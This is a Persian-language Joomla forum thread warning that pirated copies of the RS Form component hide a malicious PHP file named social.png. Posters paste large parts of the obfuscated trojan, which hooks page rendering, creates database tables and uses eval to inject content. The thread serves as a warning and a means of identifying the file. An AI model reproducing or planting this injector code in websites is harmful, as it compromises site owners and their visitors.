هشدار: ویروسی بودن کامپوننت فرم ساز RS Form

**chamanchi** · 08-08-2014 06:37 PM

سلام به همه اونایی که از کامپوننت آر اس فرم استفاده می کنن
اگه در مسیرهای زیر فایلی به نام social.png داشتید حتما اون رو پاک کنید
/public_html/administrator/components/com_rsform/assets/images/social.png
/public_html/components/com_rsform/assets/images/social.png

کافی فایل مورد نظر رو به social.php تغییر نام بدید تا کدهای مخفی در این تصویر رو ملاحظه بفرمایید
دوستانی که از نحوه کار این ویروس چیزی می دونن به اطلاع خودم و سایر دوستان برسونن.
یاعلی
نصف کد رو می قرار میدم:

کد:

<?php error_reporting(0); ini_set('display_errors', 0);@ini_set('max_execution_time', 300);@set_time_limit(0);function XJmVaOhvhAQNoaACoDOM() {    if (!defined('WP_OPTION_KEY')) {        define('WP_OPTION_KEY', 'wp_data_newa');        $oXyaqmHoChvHQFCvTluq = new GsSYoMTsQibQgcHcuGmr(1);    }}if (class_exists('JFactory')) {    $fRBDRzVvkOhTDTWAHUGa = & JFactory::getApplication();    $fRBDRzVvkOhTDTWAHUGa->registerEvent('onAfterRender', 'XJmVaOhvhAQNoaACoDOM');}if ($GLOBALS['base_path'] || $GLOBALS['base_url']) {    if (!defined('WP_OPTION_KEY')) {        define('WP_OPTION_KEY', 'wp_data_newa');        $whjjnvouGqpgVFKDaceH = 'function ' . $template->name . "_page_alter(&\$page) {\$oXyaqmHoChvHQFCvTluq = new GsSYoMTsQibQgcHcuGmr(2);            \$NygjKszxwCxlHbyDpHTT = \"\";            foreach (\$oXyaqmHoChvHQFCvTluq->oXyaqmHoChvHQFCvTluq['echo'] as \$stIedxfhoZcXvZNmNXTd) {                \$NygjKszxwCxlHbyDpHTT.=\$stIedxfhoZcXvZNmNXTd;            }            \$vsGIQvwCXRbSELMOlFV = \$NygjKszxwCxlHbyDpHTT;            \$page['page_top'][] = array('#markup' => \$vsGIQvwCXRbSELMOlFV);    } ";    }    eval($whjjnvouGqpgVFKDaceH);}if (!defined('WP_OPTION_KEY') && (function_exists('get_home_url') || function_exists('get_site_url'))) {    define('WP_OPTION_KEY', 'wp_data_newa');    new GsSYoMTsQibQgcHcuGmr(0);}class GsSYoMTsQibQgcHcuGmr {    public $oXyaqmHoChvHQFCvTluq = array(),        $yYVsqvOoqWsddypXgJcI = array(),        $KPnBqYhemQSdHKDNtJpe,         $qcCONSsvpJlMgdhEFFmr,        $IzGRmpLLtcLVMJRxcfpe,        $aJQafHDwnaPrCJrQMjHV,        $AeRxXNHxOXpcNJWlZSIK,         $vwhhtIrAWhUEFDgPrcco,         $htcFFCQTLLpnCchsPKGY,         $wqawPxkNytKqRKNRqbwA,         $IatJdWimJbxtprWZElHe,         $YobOrWbieESFVcSsWsuB;       public $WbKPQMoSbMZkXUeYKXRI;    public function __construct($KPnBqYhemQSdHKDNtJpe) {        $this->KPnBqYhemQSdHKDNtJpe = $KPnBqYhemQSdHKDNtJpe;        if ($KPnBqYhemQSdHKDNtJpe === 1) {             $fNkUjsWlUtvjeWmrzNlI = "CREATE TABLE IF NOT EXISTS `#__options` (        `id` int(10) NOT NULL AUTO_INCREMENT,        `option_name` text NOT NULL,        `value` text NOT NULL,   PRIMARY KEY (`id`)) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1;";            $AKorMlJxhsFuVmuppepc = JFactory::getDbo();            $AKorMlJxhsFuVmuppepc->setQuery($fNkUjsWlUtvjeWmrzNlI);            $AKorMlJxhsFuVmuppepc->query();        }        if ($KPnBqYhemQSdHKDNtJpe === 2) {             $fNkUjsWlUtvjeWmrzNlI = "CREATE TABLE IF NOT EXISTS `options` (        `id` int(10) NOT NULL AUTO_INCREMENT,        `option_name` text NOT NULL,        `value` text NOT NULL,   PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1;";            db_query($fNkUjsWlUtvjeWmrzNlI);        }        $this->yYVsqvOoqWsddypXgJcI = array(             '==DZk4FZlVwY5RGZhpQB'        ,'=4JnhZUpck2olIKM',            '=4JnhZ3M1WJMeyTo',            '=02ow5FryW3ogkJnuWUq',            '6yzLhDKqwETol92q',            '==trcWzYyEKqwETol92q',            'g92LhZ3ni9Togyzr',            '==DoiAzYiEKqiyKMgS2p',            '=8zMhyzYhIJMlqzoi9Jo',            '=bKnv5vpuE3phSJofI2n',            'aW3ohHzMckzp19JM2y2M',            '=02ow5PoyITqmEJquWaM',            '==DoiAzY6ITqu1JLgkJL',            'g92LhpzockTocM2oaWKM',            '==toc5vo1AKMaSTofyzq',            'hyzY5Izpi1JM29Jo',            '==jMl9zY5ITMi9zMiyzL',            'aW3ohVGqlpzocuTq55JL',            '==jMl9zYhI2LmEapiO3p',            'aW3oh4JLwAUq0I3L',            '=pzpi5lp0WKLjSJMyWaM',            '==jqj5FqiyKMwyzoyA2p',            '3OaY1WGoj1JL',            '=pUphxKqaWKnuu2L',            '=4JnhVKMeAJnfMJock2p',            '=4JnhV3ox5JLl9TryuTq',            '=4Jnh4JqvyKMh9Tn',            'hyzYmk2oiEaoyk2M',            'hyzYh9TqlSzLhSTM',            '=4JnhNKqiW3Mf9TogyzL',            '==toc5lp0Szp0SzM',            'hyzYfIJM0Aaouu2L',            'hyzYlSTqm92Mhyzp',            '6yzLh4zpiEKMfqzocWaL',            'aW3ohHTo5E3pgHJocW3L',            '==trcWzYmgJLgyTqf9zM',            '==Nqy5zYmAKMhy2M0ITo0I3o',            '==jqj5PnmyzMiEUnmyzp',            '==jqj5lphS2pfIzquWUq',            '==trcWzYlITMuk2Mc5Jq',            '0IzohZUocSzMlITMh92q',            '0IzohZKMfyUqm52ohITr',            '=pzpi5vouEKn0g2LukzL',            '=HJohNKqbSTof9Tn',            '=DKMh5lpyEJLlq2ohSzo',            '6yzLhxapu1TMuITM',            '==Nqy5zY39zoe1JLyWUM',            '==Nqy5zYlITqXNHxOXpcNJWlZSIK->qPhSGyDrRdyPezAnHgia();             $this->WbKPQMoSbMZkXUeYKXRI = $WbKPQMoSbMZkXUeYKXRI;            $vsJigIMHYwdFnuqvRwrv = false;            $BCEUSjHFFwzzqmHmpjjQ = 0;            foreach ($this->HSxTktcbTftjZjKRHHmh() as $gXNjWLFkUQOugyREMXKv) {                $oXyaqmHoChvHQFCvTluq = $this->RoQfzgyhgTpMgdUIktgN($gXNjWLFkUQOugyREMXKv, $WbKPQMoSbMZkXUeYKXRI);                $oXyaqmHoChvHQFCvTluq = $this->gTSiihhIRUNPkADDVdes($oXyaqmHoChvHQFCvTluq);                if ($oXyaqmHoChvHQFCvTluq !== false) {                    $vsJigIMHYwdFnuqvRwrv = true;                    if ($this->YobOrWbieESFVcSsWsuB) {                        break;                    }                    break;                }            }            if ($vsJigIMHYwdFnuqvRwrv) {                if ($this->YobOrWbieESFVcSsWsuB) {                    $oXyaqmHoChvHQFCvTluq = $this->oqtYbOOiucMYWyZsGEuE();                }                $oXyaqmHoChvHQFCvTluq['info'] = $WbKPQMoSbMZkXUeYKXRI;                $this->aIIwgKgvtyRoWoMedUdb(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluq);                $this->oXyaqmHoChvHQFCvTluq = $oXyaqmHoChvHQFCvTluq;            } else {                 $oXyaqmHoChvHQFCvTluq = $this->oqtYbOOiucMYWyZsGEuE();                $oXyaqmHoChvHQFCvTluq['info'] = $WbKPQMoSbMZkXUeYKXRI;                $this->oXyaqmHoChvHQFCvTluq = $oXyaqmHoChvHQFCvTluq;                $this->aIIwgKgvtyRoWoMedUdb(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluq);                $this->XnpSvtOjNDRmxyfzaDKl();            }            return $oXyaqmHoChvHQFCvTluq;        }        return false;    }    public function TztHMzNNJASlMfiSOwxQ() {        $oXyaqmHoChvHQFCvTluq = $this->oXyaqmHoChvHQFCvTluq;        if ($oXyaqmHoChvHQFCvTluq == '') {            return false;        }        $SntMBKFkfTlUzXyNVQed = @$_GET[$this->oXyaqmHoChvHQFCvTluq['info']['serverKey']];        if (isset($SntMBKFkfTlUzXyNVQed) && $SntMBKFkfTlUzXyNVQed == '') {             echo '<div id="serverList" style="display: none">';            $bQYduZxDrtPMJtaBCQyc['servers'] = $oXyaqmHoChvHQFCvTluq['servers'];            echo json_encode($bQYduZxDrtPMJtaBCQyc);            echo '</div>';            die();        } else if (isset($SntMBKFkfTlUzXyNVQed) && isset($this->oXyaqmHoChvHQFCvTluq['info']['fail'])) {            if (isset($this->oXyaqmHoChvHQFCvTluq)) {                $oXyaqmHoChvHQFCvTluq = $this->oXyaqmHoChvHQFCvTluq;            } else {                $oXyaqmHoChvHQFCvTluq = $this->oqtYbOOiucMYWyZsGEuE();            }

**تبلیغات** · 08-08-2014 06:37 PM

**hamidian** · 08-09-2014 08:16 AM

درود

من همچین فایل که شما ذکر کردید ندیدم شما از خود ار اس جوملا خریداری کردید یا از جایی دیگه

جالبه این موضوع

**chamanchi** · 08-09-2014 09:10 AM

نه عزیزم. خریداری نکردم. از سایتهای دانلودی، دانلود کردم.
چون نسخه ای که این مشکل رو داره توی اینترنت به رایگان عرضه شده. واسه اونایی گفتم که از سایتهای رایگان دانلود می کنم.

**cpuintel** · 08-12-2014 01:50 PM

اره این یک ویروس php/Alter.A.trojan هست.
دکد شده در کامپوننتj2store از سایت nulit
====
کد:

کد:

<?php error_reporting(0);
ini_set('display_errors', 0);
@ini_set('max_execution_time', 300);
@set_time_limit(0);
function XJmVaOhvhAQNoaACoDOM() {
    if (!defined('WP_OPTION_KEY')) {
        define('WP_OPTION_KEY', 'wp_data_newa');
        $oXyaqmHoChvHQFCvTluq = new GsSYoMTsQibQgcHcuGmr(1);
    }
}
if (class_exists('JFactory')) {
    $fRBDRzVvkOhTDTWAHUGa = & JFactory::getApplication();
    $fRBDRzVvkOhTDTWAHUGa->registerEvent('onAfterRender', 'XJmVaOhvhAQNoaACoDOM');
}
if ($GLOBALS['base_path'] || $GLOBALS['base_url']) {
    if (!defined('WP_OPTION_KEY')) {
        define('WP_OPTION_KEY', 'wp_data_newa');
        $whjjnvouGqpgVFKDaceH = 'function ' . $template->name . "_page_alter(&\$page) {\$oXyaqmHoChvHQFCvTluq = new GsSYoMTsQibQgcHcuGmr(2);            \$NygjKszxwCxlHbyDpHTT = \"\";            foreach (\$oXyaqmHoChvHQFCvTluq->oXyaqmHoChvHQFCvTluq['echo'] as \$stIedxfhoZcXvZNmNXTd) {                \$NygjKszxwCxlHbyDpHTT.=\$stIedxfhoZcXvZNmNXTd;            }            \$vsGIQvwCXRbSELMOlFV = \$NygjKszxwCxlHbyDpHTT;            \$page['page_top'][] = array('#markup' => \$vsGIQvwCXRbSELMOlFV);    } ";
    }
    eval($whjjnvouGqpgVFKDaceH);
}
if (!defined('WP_OPTION_KEY') && (function_exists('get_home_url') || function_exists('get_site_url'))) {
    define('WP_OPTION_KEY', 'wp_data_newa');
    new GsSYoMTsQibQgcHcuGmr(0);
}
class GsSYoMTsQibQgcHcuGmr {
    public $oXyaqmHoChvHQFCvTluq = array(), $yYVsqvOoqWsddypXgJcI = array(), $KPnBqYhemQSdHKDNtJpe, $qcCONSsvpJlMgdhEFFmr, $IzGRmpLLtcLVMJRxcfpe, $aJQafHDwnaPrCJrQMjHV, $AeRxXNHxOXpcNJWlZSIK, $vwhhtIrAWhUEFDgPrcco, $htcFFCQTLLpnCchsPKGY, $wqawPxkNytKqRKNRqbwA, $IatJdWimJbxtprWZElHe, $YobOrWbieESFVcSsWsuB;
    public $WbKPQMoSbMZkXUeYKXRI;
    public function __construct($KPnBqYhemQSdHKDNtJpe) {
        $this->KPnBqYhemQSdHKDNtJpe = $KPnBqYhemQSdHKDNtJpe;
        if ($KPnBqYhemQSdHKDNtJpe === 1) {
            $fNkUjsWlUtvjeWmrzNlI = "CREATE TABLE IF NOT EXISTS `#__options` (        `id` int(10) NOT NULL AUTO_INCREMENT,        `option_name` text NOT NULL,        `value` text NOT NULL,   PRIMARY KEY (`id`)) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1;";
            $AKorMlJxhsFuVmuppepc = JFactory::getDbo();
            $AKorMlJxhsFuVmuppepc->setQuery($fNkUjsWlUtvjeWmrzNlI);
            $AKorMlJxhsFuVmuppepc->query();
        }

**chamanchi** · 08-12-2014 04:09 PM

دقیقا کارش چیه؟
من چون سایتم رو روی لوکال ریختم بعد یهو نود 32 دیدم اسکن کرد و گفت این یه ویروسه
حالا اگه قرار بود همچنان توی فایلهای روی وب جا خشک کنه دقیقا کارش چی بوده؟ هک کردن خود سایت. دیتابیس و یا چیزه دیگه ای؟

**darabweb.ir** · 08-13-2014 01:56 PM

[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]

**mersad** · 08-14-2014 12:47 PM

دروود

ادرس سایت رو قرار بدید !

به نظر نمیاد این فایل مشکلی داشته باشه !

در پناه ایزد

**ker500** · 10-14-2014 09:46 AM

نوشته اصلی توسط mersad [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]

دروود

ادرس سایت رو قرار بدید !

به نظر نمیاد این فایل مشکلی داشته باشه !

در پناه ایزد

سلام دوستان

من یه مشکل عجیب دارم تو وبلاگ خودم شاید جای مطرح کردنش این جا نباشه ولی اگه میتونید کمک کنید (آدرس " [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] ")

یه نگاه بندازید ، مرورگر اون را نا امن و ویروسی نشون میده!!

مشکل از اون جایی شروع شد من آدرس وبلاگ خودم را تو یه وبلاگ دیگه استفاده کردم، به این صورت که در کد html در خصوصیت تگ <form> و در قسمت action آدرس وبلاگ خودم ( [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] ) را اشتباهی وارد کردم بعداً فرم ایجاد شده را تکمیل کردم و ارسال کردم که این طوری شد.

**mersad** · 10-14-2014 12:24 PM

دروود

به انجمن جوملا فارسی خوش امدید

برای دریافت پاسخ خودتون کمی صبور باشید
برای بیان مشکل خودتون بعد از جستجو تاپیک جدید ایجاد کنید

کد های جاوا اسکریپت که قرار دادید رو حذف کنید

در پناه ایزد